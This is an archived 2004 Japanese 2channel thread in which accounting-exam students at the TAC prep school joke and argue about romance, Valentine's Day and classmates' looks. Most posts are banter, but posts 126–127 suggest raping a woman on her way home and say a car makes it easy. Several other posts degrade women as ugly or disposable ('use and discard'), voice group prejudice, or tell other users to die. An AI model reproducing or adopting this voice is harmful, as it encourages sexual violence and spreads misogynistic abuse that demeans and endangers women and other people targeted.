2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【好きだぁー!】受験生の恋愛【男と女】

1 :一般に公正妥当と認められた名無しさん:04/02/07 11:19 ID:zQZpaMRq
おまいら恋してんの?

2 :一般に公正妥当と認められた名無しさん:04/02/07 11:21 ID:???


3 :一般に公正妥当と認められた名無しさん:04/02/07 11:41 ID:???
普通に彼女いるよ
あんまり会えないけど

4 :一般に公正妥当と認められた名無しさん:04/02/07 11:48 ID:xS24ozD0
女ほしいけど、俺なんか相手してくれない。

5 :一般に公正妥当と認められた名無しさん:04/02/07 12:07 ID:???
┌─────────────────────────┐
│☆☆☆☆☆☆☆☆―おいらの心の愛 ―☆☆☆☆☆☆☆☆│
│☆    ┏━┓┏┳┓      ┏┳━━━┳━┓┏┓    ☆│
│☆    ┣━┫┃┃┣┳━━┛┣━┳┓┣━┛┃┃    ☆│
│☆    ┗━┛┣╋┛┗┳┓┏┛  ┃┣┛    ┃┃    ☆│
│☆    ┏━━┛┣┓┣┛┃┃┏━┛┃┏━━┛┃    ☆│
│☆    ┗━━━┛┗┛  ┗┛┗━━┛┗━━━┛    ☆│
│☆       ┏┳┓┏┳┓    ┏┳━━┳┳┓         ☆│
│☆       ┃┃┣┛  ┗┳━┛┃ ━ ┃┃┃         ☆│
│☆       ┃┃┣┓┃┏┻┓┏┫┏┓┃┃┃         ☆│
│☆       ┗┫┃┗┫┃  ┃┃┗┛┃┃┃┗┓       ☆│
│☆         ┗┛  ┗┛  ┗┛    ┗┻┻━┛       ☆│
│☆                             ▼▼▼▼   ☆│
│☆    本日 PM 3:00 開演   場所 空地      ・__・    ☆│
│☆             来ないやつは逮捕    〇      ☆│
│☆                            3     .☆│
│☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆│
└─────────────────────────┘


6 :一般に公正妥当と認められた名無しさん:04/02/07 13:50 ID:FfaQFEOs
彼女いるが正直めんどくさくなってきた

7 :一般に公正妥当と認められた名無しさん:04/02/07 14:04 ID:???
>>6
じゃあ俺がかわいがってやるよ。

8 :一般に公正妥当と認められた名無しさん:04/02/08 20:41 ID:ajxx8ESY
受験生でなくとも、何かに向かって努力している女性がいいと思うが、
そういう人に限って外見がよろしくなかったりする…

でも、普通の女性だと理解がなく養うだけで、しかも生活に張りもなく面どい…

9 :一般に公正妥当と認められた名無しさん:04/02/08 21:57 ID:???
もう女には疲れた。飽きた。

今は公園で小さな男の子と遊ぶのが一番楽しい。
エネルギーの塊のような小さな体を抱きしめると元気が出てくる。

10 :一般に公正妥当と認められた名無しさん:04/02/08 22:12 ID:???
>>9
同意。
きちんとした付き合いとなれば、もうたまったもんでない。
ご機嫌とならなきゃならんし、金の羽振り良くなきゃいかんし…
やることなすこと何の価値も見出せないようなお遊びばかり…

11 :一般に公正妥当と認められた名無しさん:04/02/08 23:00 ID:k+svwIqc
はぁ〜。
確かに理解ある女じゃないとムリ。

12 :一般に公正妥当と認められた名無しさん:04/02/08 23:05 ID:???
合格者と受験生が今から付き合い始めるってのはどうよ?
うまくいくかな?

13 :一般に公正妥当と認められた名無しさん:04/02/08 23:17 ID:???
さてさて、今週末はバレンタインデーですが。
みなさんいかがお過ごしで?


14 :一般に公正妥当と認められた名無しさん:04/02/08 23:21 ID:???
おまえらそんな贅沢言えたクチか。この妄想ホモ野郎!!
理サブでオナってろ!!!!!

15 :一般に公正妥当と認められた名無しさん:04/02/08 23:23 ID:k+svwIqc
デートだ一応。

16 :一般に公正妥当と認められた名無しさん:04/02/08 23:52 ID:a4VxQ8rY
簿記が彼女です、最高の彼女です。

17 :一般に公正妥当と認められた名無しさん:04/02/08 23:54 ID:SJSuHknb
オレは簿記大嫌いだ。というか苦手だ。

彼女にしたいのは32の大人の女性だ。
かわいい。

18 :一般に公正妥当と認められた名無しさん:04/02/08 23:57 ID:a4VxQ8rY
大嫌いじゃ受からんぞ、簿記は皆出来るしさ。

19 :一般に公正妥当と認められた名無しさん:04/02/09 00:09 ID:???
簿記が彼女か。

実に、理屈理屈できっちりしてそうだ。


20 :一般に公正妥当と認められた名無しさん:04/02/09 00:48 ID:???
俺も簿記が彼女だな。
貸借がきっちりあった時なんて、女をいかせる以上の満足感。

21 :一般に公正妥当と認められた名無しさん:04/02/09 00:59 ID:gWCW7MK7
>>20
うむ。その気持ちわかる。

22 :一般に公正妥当と認められた名無しさん:04/02/09 01:10 ID:???
資格取得→おまいらみたいなのがふえる→少子化→将来不安→資格取得
→おまいらみたいなのが(以下略)

23 :一般に公正妥当と認められた名無しさん:04/02/09 01:15 ID:???
俺は家庭をもつ甲斐性はない。

ベンチャー成功者や開業医みたいな人には一夫多妻制を認めてやって、
彼らに10人20人子供を作ってもらう方がいいな。

24 :一般に公正妥当と認められた名無しさん:04/02/09 01:33 ID:???
   _、_
mo( ,_ノ` ) < 俺はそんなおまいらが心配だぜ!


25 :一般に公正妥当と認められた名無しさん:04/02/09 01:34 ID:???
ズレてるし・・・

26 :一般に公正妥当と認められた名無しさん:04/02/09 02:36 ID:uygw+SZU
カップルの場合、男だけ落ちて、女はうかる。
そして女は去って行く。
古来からの常識。
バカは男だけ。
男どもよ、もっと冷静になれ。
彼女はもっと冷静に自分の将来を考えて勉強に勤しんでいるのだ。
好きだぁーと思って熱くなっているのはおバカな君だけなんだよ・・・。


27 :一般に公正妥当と認められた名無しさん:04/02/09 08:37 ID:5IWq0ZjF
だれかTACの受付嬢を口説いた奴いないの?

28 :一般に公正妥当と認められた名無しさん:04/02/09 11:45 ID:RpkCWgiG
>26 そうだな。ていうか知り合いにいたそのケース。2年目だけど今年ってカップル
多くないか?なんか専門学校ていうか大学って感じな気がするよ。かつて受かった人が
3次の勉強できたら、ずいぶんと雰囲気が良くなりすぎてTACじゃないって言ってたよ。
本校の話だけどさ。男が受かると見せて、女の方が実は合格が先らしい。そして、ようやく
男が目が覚める。男だけ短答落ちした時、飲み会でなぐさめるのが大変だった。

>27 狙ってる人いるん?さすがに判例はないんじゃないか?リスクがでかいだろ。いや、
むしろリスク、不確実性を超えて、あいまい性だね。

29 :一般に公正妥当と認められた名無しさん:04/02/09 13:29 ID:???
そうか、殺伐としているべきなのか、TACは。

30 :一般に公正妥当と認められた名無しさん:04/02/09 13:52 ID:JCLu/pLm
受け付けなんて低脳過ぎる奴等を相手にするわけが無い。

31 :一般に公正妥当と認められた名無しさん:04/02/09 14:40 ID:???
というか受け付けも低脳だろ。
俺たちも低脳だけどさ。

32 :一般に公正妥当と認められた名無しさん:04/02/09 14:49 ID:???
>30の文章はどちらとも取れるな

33 :一般に公正妥当と認められた名無しさん:04/02/09 15:56 ID:ekiPyhaV
低脳は、おそらく受付の女じゃない。おそらく。

34 :一般に公正妥当と認められた名無しさん:04/02/09 15:59 ID:???
33の文章もどちらとも取れるな。
一ついえることはこんなことを考えてるおれたちが低脳だということだ。

35 :一般に公正妥当と認められた名無しさん:04/02/09 18:39 ID:F42QTP5l
女を得ても価値がどんどん下がるだけ。しかも、定率法40%くらいの勢いでだ。
女つくろうなどということは現実的な話ではない。

36 :一般に公正妥当と認められた名無しさん:04/02/09 23:35 ID:c7Fz9NAC
低脳でも良い。
資格取ったからって、得られる女のレベルも変わらないしな。
女居なきゃ、人生つまらん。

37 :一般に公正妥当と認められた名無しさん:04/02/09 23:54 ID:???
愛に生きてこそ人間なのだ

38 :一般に公正妥当と認められた名無しさん:04/02/10 00:18 ID:RYD0L3tA
たしかに、わかる気がする。
でもタックの世界って外部の人間から見るとすっごい
テンションが変に見えると思うぜ。俺は内部で勉強してても
感じるもん。だから、今タックで付き合っても、どうせ
監査法人行ったら分かれるんじゃねえ?
やっぱりタックって狭い世界だからね…
現に悪い噂なんて光のごとく流れるじゃん。
まぁ俺が彼女いないひがみかね…
まぁでもタック来て女を見る目が変わった。


39 :一般に公正妥当と認められた名無しさん:04/02/10 00:20 ID:???
噂は怖いぞ。

40 :一般に公正妥当と認められた名無しさん:04/02/10 00:21 ID:???
男女の仲なんて、環境の変化に弱いもんだしな。

41 :一般に公正妥当と認められた名無しさん:04/02/10 00:41 ID:???
俺の知り合いも彼女が先受かって、友人は捨てられていた、女は怖いと思った。
今日久しぶりに順位表見てみたらみんなの名前がのってた。懐かしかった。
俺も頑張ろうと思った。

42 :一般に公正妥当と認められた名無しさん:04/02/10 00:48 ID:???
定年退職したら、女房に捨てられる世知辛い世の中だからな。

43 :一般に公正妥当と認められた名無しさん:04/02/10 01:06 ID:???
おいおい。

なんか・・・

暗いな。


44 :一般に公正妥当と認められた名無しさん:04/02/10 01:22 ID:???
女性誌でも特集記事で出てるしな〜。
いつ旦那と離婚するのが最も経済的に得かってやつ。
離婚後の財産分与や年金を考えると、旦那の定年までは我慢した方が良いらしい。

あ〜、やだやだ。

45 :一般に公正妥当と認められた名無しさん:04/02/10 02:30 ID:PbtK6k3h
いい恋愛して、いい結婚して、人間らしい生活送りたい。
パートナーを選ぶ基準はいっぱいあるとおもうけど、
自分にとってどれが最善かは難しいよね。
恋愛も受験もすっかりヴェテだけど、
今年試験に合格できなかったらどうしようかな。
相手からは養ってあげるから結婚する?とかいわれてるけどね。
まあ今は余計なこと考えず勉強がんばらねば…。




46 :一般に公正妥当と認められた名無しさん:04/02/10 06:55 ID:cWK/yVX5
予備校の奴らって、欲求不満の固まりだから人の噂ばっかで
まじで嫌いだ。
おまいら厨房か?と叫びたくなる。


47 :一般に公正妥当と認められた名無しさん:04/02/10 07:36 ID:???
つきあってる異性のレベルは、本人のステータスを表すものの一つである。

レベルの低い異性とつきあっているということは、
本人もその程度でしかない人間であると世間に公言しているも同じである。
つきあっている異性が、●ビ、●ブ、●ゲ、●落、●産党、●価学会、●ウム、●ナウェーブ
であるということは、本人も同類同格であると世間はみなす。

これは、異性に限ったことではなく、友人においても同じことが言える。
よって、つきあうなら関学生・関学卒。これがベストである。

48 :一般に公正妥当と認められた名無しさん:04/02/10 10:32 ID:p0ZBe2UV
レベルが低いのは低学歴もだろ??関学君。

49 :一般に公正妥当と認められた名無しさん:04/02/10 16:33 ID:???
>>49
関学のような低レベルそうなやつと友達になれるか。w
友達にするなら一流国立大に限るよ。
だいたい私立のやつとはちょっと感覚が違うんで…。
早稲田に友達いるけど親友にはなれそうにない。

50 :一般に公正妥当と認められた名無しさん:04/02/11 00:22 ID:???
>>47
関学生ですが最近フラれました…

51 :一般に公正妥当と認められた名無しさん:04/02/11 02:16 ID:QFB4qDwv
>47 まぁ、ネタだろ?雪山遭難で民間利用換算にして5000万円分も
公共サービスを無駄遣いした関学生の馬鹿度を考えたら○ビや○ブの方が
まだマシだろ?必ずしも税金無駄遣いするわけじゃねえからな。

52 :一般に公正妥当と認められた名無しさん:04/02/11 08:10 ID:???
>>47
女からみた男の観点だろ?
オレは男から女へ見たら、それら+ブス、やりまん
だろうな

53 :一般に公正妥当と認められた名無しさん:04/02/11 12:30 ID:???
>>51
彼女いない歴何年ですか?

54 :一般に公正妥当と認められた名無しさん:04/02/11 15:17 ID:kwolYeAI
外見の欠点をズラズラ並べてる奴の方がレベル低いと思うが・・。

55 :一般に公正妥当と認められた名無しさん:04/02/11 15:20 ID:qWNeHPl+
一般に公正妥当と認められた結婚(彼女、セフレ)基準について語って頂きたい。

56 :広島でも、福井でも、:04/02/12 15:35 ID:???
>>47-51
平松学長、また謝罪してますねぇ。。。



【学長、現地訪れ謝罪 関学大生遭難事故】

 関西学院大学ワンダーフォーゲル部の学生十四人の遭難事故で、
同大の平松一夫学長(56)は十日朝、福井県勝山市を訪れ、山岸
正裕市長(58)に「ご迷惑をおかけしました。全員が無事帰るこ
とができたのは、皆さんのご尽力のおかげ。感謝しています」と感
謝の気持ちを伝えた。

 同市役所内で記者会見に臨んだ平松学長は、事故の調査検証のた
め、同部内に専門家ら第三者を含む調査委員会を発足させる意向を
明らかにした。

 山岸市長は面談の中で、「地元の者からみれば、この厳寒期に最
奥部への登山を計画するのはいかがなものか、と思う」と苦言を呈
し、平松学長は神妙な表情で聞き入った。

 この後、平松学長は、福井県庁を訪問。午後からは勝山署などを
回り、謝罪と感謝の気持ちを伝える。
http://www.kobe-np.co.jp/kobenews/sougou04/0210ke13110.html

57 :一般に公正妥当と認められた名無しさん:04/02/13 20:55 ID:4sWoFLfs
バレンタインデーなんか嫌いだぁあああああああああああ!

58 :一般に公正妥当と認められた名無しさん:04/02/13 21:50 ID:???
明日のデート楽しみです!

59 :一般に公正妥当と認められた名無しさん:04/02/13 23:02 ID:???
受付と付き合いながら、同じクラスの女とも付き合っている
2005年目標クラスの馬鹿です

60 :一般に公正妥当と認められた名無しさん:04/02/13 23:46 ID:???
>>59
氏ね

61 :一般に公正妥当と認められた名無しさん:04/02/14 00:55 ID:OXbyFaDQ
>59もういっちょ士ね

62 :一般に公正妥当と認められた名無しさん:04/02/14 01:22 ID:8LGxg+Oq
14日に勉強するってなんか悲惨だね。
夜までいたりしたら哀愁漂う、気まぐれでいいからだれかくれないかなぁ?
バレンタインデーを追い風にする、これで合格決まるね


63 :一般に公正妥当と認められた名無しさん:04/02/14 02:56 ID:???
明日は何個もらえるかな。
13日の時点で2つもらった \( ^▽^)/
喫茶店の女の子とクリーニング屋の女の子。
チロルチョコみたいだけど「義理」とは言ってなかったので、本命の可能性も否定できない。

64 :一般に公正妥当と認められた名無しさん:04/02/14 04:14 ID:???
すごいプラス思考だ・・

65 :一般に公正妥当と認められた名無しさん:04/02/14 07:47 ID:AIiIKTy5
案外このプラス思考が合格の秘訣かもしれん。。。

66 :一般に公正妥当と認められた名無しさん:04/02/14 14:02 ID:???
************** 重要 **************

バレンタインデー中止のお知らせ(補足)

本日開催予定のバレンタインデーは諸事情により中止になっております。
この決定により、ホワイトデーも中止ということになります。
しかしながら通知の不徹底により一部でバレンタインデーまがいの行事が
行われている模様です。
当通知を受け取られた方々におかれましては混乱すること無く、普段の
生活をお楽しみくださいませ。
当方の不手際でこのような事態を招いた事を謹んでお詫び申し上げます。

************** 重要 **************

67 :59:04/02/14 21:05 ID:???
今日同じクラスの女からチョコもろた。
他にも俺に渡そうとした女いたがw

68 :一般に公正妥当と認められた名無しさん:04/02/14 21:43 ID:???
質問。

かわいい子には男ついてます。
売れ残りはお察しください。
ブスとは付き合いたくないし、かといって今は手間暇かけたくない、
かといってセックスはしたい。
風俗いく金はない。
こんな私はどうすればいいんでしょう。

69 :一般に公正妥当と認められた名無しさん:04/02/14 21:50 ID:???
オナニーをするんだ!

70 :一般に公正妥当と認められた名無しさん:04/02/14 22:08 ID:Ok/hf01T
奪えよ。
世の常だろ。

強いものが勝つ。

俺はでも、もうしない。

71 :一般に公正妥当と認められた名無しさん:04/02/14 22:18 ID:???
彼氏持ち(とくにかっこよくない)の女が
どうやら俺に気が傾いているんだが
マーク外す飛込みで僕はサッと奪い去ってもよいのかな?

72 :一般に公正妥当と認められた名無しさん:04/02/14 22:26 ID:???
>>71
その女はかわいいのか?

73 :一般に公正妥当と認められた名無しさん:04/02/14 22:35 ID:???
ギャルっぽいのです

74 :一般に公正妥当と認められた名無しさん:04/02/14 22:57 ID:???
ちなみに何校?w

75 :一般に公正妥当と認められた名無しさん:04/02/14 22:57 ID:???
とりあえず味見していらなきゃ返却だろ。


76 :一般に公正妥当と認められた名無しさん:04/02/14 23:07 ID:???
>>71
僕はずっとずっと一人で生きていくのかと思っててください。


77 :38の人です。:04/02/14 23:08 ID:f5aS5/I1
>>68
おれは大学入るまでブスでもおおけーだとおもった。
けれども、タックの女の子ばかり見てるから錯覚に
陥るかもしんないけど、ブスはやっぱ辞めといた方がいい。
性格の悪さが顔にダイレクトに表れている。
おなにーで我慢するのが男だ。妥協しない方がいい。
結婚したら人生棒に振る。自分の親みて思う。

78 :一般に公正妥当と認められた名無しさん:04/02/14 23:12 ID:???
やれ。
いらなきゃ捨てろ。
で、何校だ?
こっそり教えてみ

79 :一般に公正妥当と認められた名無しさん:04/02/14 23:35 ID:???
なんで会計受験はブスばっかで税理士の方がかわいい子多いの?
さらには簿記3級とかの方がかわいいのは・・・
やっぱり、、、そうだよね、、、
大学で分かってたことだけど、、、。
でも、ブスでもでかい態度取れるのは需要と供給の関係ですか?
供給が少なければ価格が高くても売れるのですね・・・

てかブスはくんなよ。
家から出てくるなよ。

80 :71:04/02/14 23:49 ID:???
非東京の地方校です。
その女、同じクラス内では、けっこうモテてるようだが
つんけんしててTAC内では誰ともしゃべってない。
(俺もあまりTACではしゃべらん、同じ学校の知り合いたくさにるけど
特にTACで馴れ合おうとは思わん)
2人ほど比較的カッコイイ奴が意図ありげに近くの席に座り続けたが
いつのまにか去っていった。
そして常に俺の近くに座っている
(というか大体みんな毎週同じ席だけどね)
ちなみに同じ大学。一回だけ学校で隣に座ってきた。
そして話しかけてきた。試験前だったんでプリントがどうたらこうたら。
(むろんTACで同じクラスであるということはお互い知ってる)
初めてしゃべる機会だったんで、事務的なおしゃべりだけで終了。
向こうはなれなれしいしゃべり方だったが、こっちは敬語。
講義中もなんか気まずい雰囲気だったなぁ。
その次の日の講義日になぜかいつもしている右手薬指の指輪が消えていた。
ちょうど掲示板前で会ったが(というか向こうがトイレで見計らっていた?)
特にしゃべらず、不自然的に2mくらい離れて教室に向かった。
で席はいつもと同じく斜め前。
うちのクラスは前の席から埋まっていくんだけど
俺ら2人だけはぽつんと後ろのほう(はたからみて異常)
その後その間は埋まっていくんだけどね。

81 :一般に公正妥当と認められた名無しさん:04/02/14 23:54 ID:???
ぶっちゃけ関西三校のうちのどれかですか?
大学は国立ですか私立ですか?
知ってるシチュエーションににているのでw

82 :71:04/02/15 00:00 ID:???
ぶっちゃけ言えない
想像にお任せ。
知ってるシチュエーションだったらそれかもねw

83 :一般に公正妥当と認められた名無しさん:04/02/15 00:06 ID:???
建物は高いですか?
低いですか?
21Fとか22Fとかあります?
どーせ自分はTACでの政治事には興味ない、、、
てか友達いないんで教えてくださいw

84 :一般に公正妥当と認められた名無しさん:04/02/15 00:07 ID:???
かんちがい

85 :一般に公正妥当と認められた名無しさん:04/02/15 03:19 ID:???
>>71
その状況だけで自分に気が傾いてるって思える71のポジティブシンキングに乾杯!

86 :一般に公正妥当と認められた名無しさん:04/02/15 05:40 ID:G0OfaK8A
>71
その後しゃべってないのか?

87 :一般に公正妥当と認められた名無しさん:04/02/15 10:50 ID:???
>>80
気のせいだから

88 :一般に公正妥当と認められた名無しさん:04/02/15 11:11 ID:RJroaQf7
勉強に専念してると少しおかしくなるのかな。
年増女にコクられて「俺試験終わったら結婚するんだ」といったらそれから急に無視してきて、でもハッと気付くと自習室隣の席にきたり家の玄関に手作り弁当おかれてたり無言電話にトイレの横での啜り泣き、
早く氏ねばいいのに。

89 :一般に公正妥当と認められた名無しさん:04/02/15 11:25 ID:???
それはストーカーです
警察に相談しましょう

90 :一般に公正妥当と認められた名無しさん:04/02/15 12:23 ID:???
   _,,-ー^ヽ     ,ー-、        l`'-──'^''ヽ            
  ー´-, ァ´    `l、_l    ,,-ァ  `ー゙´ ̄~`l 「  /⌒`'⌒`、
 l`'ニェ' 'ェニ´ヽ      ,,.-''/        .| |  |     |
  ~  / /   ̄  r、__,,.-''゙,,.-'´    l`'-ー─-'  `、 \  /
  ,ェニ-'      ヽ_,rー'゙´       `ー'゙´ ̄ ̄`゙^   `、/


91 :一般に公正妥当と認められた名無しさん:04/02/15 13:30 ID:???
TACとかにいるブスってみんな態度悪いん?クラブとか学パーとかで知り合ったかわいーこしか友達にいなかったんだけどTAC 入ってノートとかの為ブスと話してやってるんだけど態度悪いな。そういうもの?

92 :一般に公正妥当と認められた名無しさん:04/02/15 13:42 ID:???
あきらめろ。
顔悪い→いじめられる→資格取って見返そう→TAC 入る→可愛い子少ないからそれなりに相手にされる→勘違い
これが現実だ。
町で普通に見たらゲッと思うのでもTAC なら普通に見えちゃうだろ。

93 :一般に公正妥当と認められた名無しさん:04/02/15 15:21 ID:RUXaE5TD
それを言うなら男も同じだろ。
センス無い服に不細工な顔。
お前ら、アニメお宅か?
もてないのをブスばっかと女のせいにして。
早いトコ氏ねよ。

94 :一般に公正妥当と認められた名無しさん:04/02/15 15:30 ID:ebbM9iDU
アニオタなんかじゃねーよヽ(`Д´)ノ
鉄オタだよ

95 :一般に公正妥当と認められた名無しさん:04/02/15 17:30 ID:???
男も終わってるの多いな。
不細工の番いがうざい。

96 :一般に公正妥当と認められた名無しさん:04/02/15 22:38 ID:U6gSjtQb
>71
勘違いも甚だしいな。

お前が勝手に盛り上がってるだけだろ。
第一、同じ大学の奴に敬語のお前の方がキモイ。氏んだ方がいいんじゃないか?

97 :一般に公正妥当と認められた名無しさん:04/02/16 01:13 ID:???
俺は服オタだよ。全身ギャルソンだぞ。

98 :一般に公正妥当と認められた名無しさん:04/02/16 06:45 ID:NP//5rkD
専門のオタどもに愛想振りまかないとツンケンしてると言われるようです。
女性の皆さん気をつけましょう。

99 :一般に公正妥当と認められた名無しさん:04/02/16 12:30 ID:???
不細工なのは監査法人いけないから他の路を探したほうがいいよ。

100 :一般に公正妥当と認められた名無しさん:04/02/16 16:36 ID:ka665yza
97は服だけじゃなく、性格もあれも少年のよう

101 :一般に公正妥当と認められた名無しさん:04/02/16 19:12 ID:???
鉄オタなんかじゃねーよヽ(`Д´)ノ
会計オタだよ

102 :一般に公正妥当と認められた名無しさん:04/02/16 19:14 ID:???
おととい1年思いを寄せてる子とデイトしたよ。でもチョコくれなかった。
微妙w

103 :一般に公正妥当と認められた名無しさん:04/02/16 19:46 ID:???
>>100
わかりにくいつっこみをするなよな。
このスレの住人の99%が理解不能だろう。
なんせこの業界の服のダサさは群を抜いてるからな。
平均的東大生の足元にすら及ばないレベルだろう。
みんな丸井ぐらいはせめて行ってくれ(ただし丸井で満足するなよ)。
見苦しくないというのも大事だよ。

104 :一般に公正妥当と認められた名無しさん:04/02/16 20:04 ID:???
>>102
相手の女性は単なる友達にしか思っていないのでは...?

105 :102:04/02/16 21:54 ID:???
どうですかね。
絵に描いたような箱入り娘で、街に飲みに出るのは忘年会くらい、お酒は年に数えるほどしか飲まない、って子なんです
失礼なので深く聞かなかったけど、多分彼氏いない歴22年だと思います。



106 :一般に公正妥当と認められた名無しさん:04/02/16 22:03 ID:???
>>105
かなり奥手のコみたいだから、チョコは家族にしかあげたことがないとか。
ちゃんと「お付き合い」の状態に至るまでには、道のりは遠いな。がんがれ。


107 :一般に公正妥当と認められた名無しさん:04/02/16 22:05 ID:???
なんでそんなんに思いを寄せるんだ?22年彼氏いないってどんな珍獣だ?写メールうぷってみてよ

108 :一般に公正妥当と認められた名無しさん:04/02/16 22:21 ID:???
TACって大学に比べて
不細工男が女(レベルはそれぞれだが)と
友達になっている率高くないな?

109 :一般に公正妥当と認められた名無しさん:04/02/16 22:45 ID:???
資格予備校ってのはブサイク・無職でも呼吸が出来る世界なんだよ。

110 :102:04/02/16 23:30 ID:???
>>106
ありがとう。
>>107
確かに美人ではないな。しかし知り合って2年くらいしてこの子の魅力に気づいたんだ。


111 :一般に公正妥当と認められた名無しさん:04/02/16 23:54 ID:???
そうか・・・。
ならガンガレ。
応援する。
俺は百人が見て百人が美人と認める子しか好きにならないし、つきあったことないから羨ましいぞ。
今、ちょっとかわいーなと思った子もモデルだった。
どうやったらあんまり可愛くない子好きになれるの?
結構マジで悩んでる。
どこで魅力を感じた?

112 :一般に公正妥当と認められた名無しさん:04/02/16 23:57 ID:???
高校生みたいなこと言ってやがんなw

113 :一般に公正妥当と認められた名無しさん:04/02/17 00:33 ID:???
111は人生棒に振っているようなもんだな。
でもよくいるんだよな、「あいつの彼女あんまりかわいくないよな」みたいなこという奴。


114 :一般に公正妥当と認められた名無しさん:04/02/17 00:35 ID:???
>>111
まず、自分を好きになることからはじめましょう。
当たってるでしょ?

115 :一般に公正妥当と認められた名無しさん:04/02/17 00:45 ID:???
バレンタインの土曜日
なぜか男ども必死に女にしゃべってたな
いつも持ってない紙袋持ってる女多かったが
そいつらにはスルーだったw

116 :一般に公正妥当と認められた名無しさん:04/02/17 00:45 ID:???
>>111
外見しか見てないんだね。もしかして、一目惚れが多い?

いろんなタイプの女の子と友達になって、自分のことを話すだけでなく、
相手の話を良く聞いて、相手のことを理解することから始めたら?

117 :一般に公正妥当と認められた名無しさん:04/02/17 07:24 ID:???
>>110
ガンガレよ。
愛だろ愛

>>111
自分の居場所が見つかるといいな・・・
ブスも三日で馴れるが美人も三日で馴れる。
そうすると中身になってくると思うよ。

118 :111:04/02/17 11:29 ID:???
マジレスくれた人ありがとん。
煽りくれる圏外の人は死んでね。
友達にはなれるけど恋人には・・・ってのがあるよね。
その基準が顔。
幼稚園くらいから美醜の感覚がすごくはっきりしてるのと極端な性格のせいかもと自覚はしてる。
でも、受験中は普通の子というか同じ立場の子の方が何かと都合いいから考えちゃうわけで。
好きになろうと思って好きになるものじゃないからしょうがないのだけどね。

119 :一般に公正妥当と認められた名無しさん:04/02/17 20:57 ID:???
>>118
人を好きになることに、基準なんて必要ないよ。
美人でないと好きになれないといっているうちは、自己満足愛でしかない。
他人から必要とされたことある? 惚れられたことある?

120 :一般に公正妥当と認められた名無しさん:04/02/17 21:18 ID:AsYYyvHz
てか、111さんは相手にそれくらい求めるということは、かなりの男前さんですか?

121 :一般に公正妥当と認められた名無しさん:04/02/17 21:47 ID:???
十中八九ブ男だとおもわれる。

122 :111:04/02/17 22:22 ID:???
期待してるようなぶちゃじゃないですよ、残念ながら。(笑)
相手に高いものを望んでいて自分がぶちゃって悲惨すぎでしょ。
努力もしてますし。
格好もちゃんとしております、家柄も学歴もちゃんとしてます。
自分でいうのもずうずうしいですけど成績優秀です。
二年本科なんで2005には受かります。

だけど、コンパとかで知り合う子と今付き合うのはだるいんで予備校にいたらいいなーと思ってるだけです。

123 :一般に公正妥当と認められた名無しさん:04/02/17 23:16 ID:T5QZlu9I
>>122イケメン
          ,,-'  _,,-''"      "''- ,,_   ̄"''-,,__  ''--,,__
           ,,-''"  ,, --''"ニ_―- _  ''-,,_    ゞ    "-
          て   / ,,-",-''i|   ̄|i''-、  ヾ   {
         ("  ./   i {;;;;;;;i|    .|i;;;;;;) ,ノ    ii
     ,,       (    l, `'-i|    |i;;-'     ,,-'"   _,,-"
     "'-,,     `-,,,,-'--''::: ̄:::::::''ニ;;-==,_____ '"  _,,--''"
         ̄"''-- _-'':::::" ̄::::::::::::::::;;;;----;;;;;;;;::::`::"''::---,,_  __,,-''"
        ._,,-'ニ-''ニ--''" ̄.i| ̄   |i-----,, ̄`"''-;;::''-`-,,
      ,,-''::::二-''"     .--i|     .|i          "- ;;:::`、
    ._,-"::::/    ̄"''---  i|     |i            ヽ::::i
    .(:::::{:(i(____         i|     .|i          _,,-':/:::}
     `''-,_ヽ:::::''- ,,__,,,, _______i|      .|i--__,,----..--'''":::::ノ,,-'
       "--;;;;;;;;;;;;;;;;;""''--;;i|      .|i二;;;;;::---;;;;;;;::--''"~
               ̄ ̄"..i|       .|i
                 .i|        |i
                 i|        |i
                 .i|          .|i
 キタ━━━━━━━━━ i|   (゚∀゚)   .|i ━━━━━━━━━━!!!
                .i|           |i
               .i|      ,,-、 、  |i
               i|      ノ::::i:::トiヽ、_.|i
           _,,  i|/"ヽ/:iヽ!::::::::ノ:::::Λ::::ヽ|i__n、ト、
     ,,/^ヽ,-''":::i/::::::::/:::::|i/;;;;;;/::::;;;;ノ⌒ヽノ::::::::::::ヽ,_Λ
     ;;;;;;:::::;;;;;;;;;;:::::;;;;;;;;:::/;;;;;;:::::::::;;;;;;/;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::;;:;;;;:::ヽ



124 :一般に公正妥当と認められた名無しさん:04/02/17 23:18 ID:???
さてと次のねたは・・・?

125 :一般に公正妥当と認められた名無しさん:04/02/17 23:19 ID:???
いつも見かけるかわいい子には彼氏がいます。
たまーに一人でいることもあるのですが、
アタックしてもいいのでしょうか?


126 :一般に公正妥当と認められた名無しさん:04/02/17 23:24 ID:???
諦めろ。
それか男とバトル覚悟でアタック。
いっそ帰り道にレイープ

127 :一般に公正妥当と認められた名無しさん:04/02/17 23:28 ID:???
車あるなら簡単だぞ。
ガンガレ

128 :111:04/02/17 23:30 ID:???
イケメンってほどでもなし。
>>121
がブチャっていうからカチンときただけ

129 :一般に公正妥当と認められた名無しさん:04/02/17 23:38 ID:???
>>125
アタックされて転がるような女だったらその程度。
もし成功しても、その女は転がりやすいってことを貴方自身で
証明しちゃってるから、先が見えてる。

うーん、なんて、心地の良いジレンマなんだろう。

130 :一般に公正妥当と認められた名無しさん:04/02/17 23:46 ID:Mya5kK86
111
         \   ∩─ー、    ====
           \/ ● 、_ `ヽ   ======
           / \( ●  ● |つ
           |   X_入__ノ   ミ   そんなエサで俺様がクマ――!!
            、 (_/   ノ /⌒l
            /\___ノ゙_/  /  =====
            〈         __ノ  ====
            \ \_    \
             \___)     \   ======   (´⌒
                \   ___ \__  (´⌒;;(´⌒;;
                  \___)___)(´;;⌒  (´⌒;;  ズザザザ

131 :一般に公正妥当と認められた名無しさん:04/02/18 00:57 ID:???
122読むと、会計士受験生にありがちなアホみたいなプライドの高さが見え隠れしているな。
成績優秀だの2005年合格だの、会計士試験にそんなのあてにならんし。
「家柄も学歴もちゃんとしてます」なんて傑作。
若い女がそんなの気にすると思っているのだろうか。

132 :一般に公正妥当と認められた名無しさん:04/02/18 01:21 ID:???
そっとしておいてあげて。w

133 :一般に公正妥当と認められた名無しさん:04/02/18 01:27 ID:???
そうそう、なまあたたく見守ってあげようよ。

134 :一般に公正妥当と認められた名無しさん:04/02/18 04:46 ID:???
「(笑)」に萌え

135 :一般に公正妥当と認められた名無しさん:04/02/18 06:40 ID:OQ/A8ekm
>126,127
